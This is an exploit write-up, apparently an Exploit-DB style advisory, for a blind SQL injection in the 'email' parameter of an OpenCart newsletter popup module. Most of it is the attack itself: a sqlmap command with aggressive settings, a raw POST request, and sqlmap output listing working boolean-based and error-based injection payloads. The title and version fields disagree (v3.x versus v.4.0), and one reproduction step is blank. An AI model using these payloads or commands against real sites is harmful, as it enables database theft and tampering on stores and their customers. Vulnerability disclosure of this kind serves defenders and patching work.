# Exploit Title: OpenCart v3.x So Newsletter Custom Popup Module - Blind SQL Injection  
# Date: 18/09/2022  
# Exploit Author: Saud Alenazi  
# Vendor Homepage:  
# Software Link:  
# Version: v.4.0  
# Tested on: XAMPP, Linux  
# Contact:  
* Description :  
So Newsletter Custom Popup Module is compatible with any Opencart allows SQL Injection via parameter 'email' in index.php?route=extension/module/so_newletter_custom_popup/newsletter.   
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.  
* Steps to Reproduce :  
- Go to :  
- Save request in BurpSuite  
- Run saved request with : sqlmap -r sql.txt -p email --random-agent --level=5 --risk=3 --time-sec=5 --hex --dbs  
Request :  
POST /index.php?route=extension/module/so_newletter_custom_popup/newsletter HTTP/1.1  
Content-Type: application/x-www-form-urlencoded  
Cookie: OCSESSID=aaf920777d0aacdee96eb7eb50  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Encoding: gzip,deflate  
Content-Length: 29  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0  
Connection: Keep-alive  
Output :  
Parameter: #1* ((custom) POST)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: createdate=2022-8-28 19:4:6&email=hi' AND 4805=4805-- nSeP&status=0  
Type: error-based  
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)  
Payload: createdate=2022-8-28 19:4:6&email=hi' AND (SELECT 4828 FROM(SELECT COUNT(*),CONCAT(0x7176627071,(SELECT (ELT(4828=4828,1))),0x7178786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- sRQS&status=0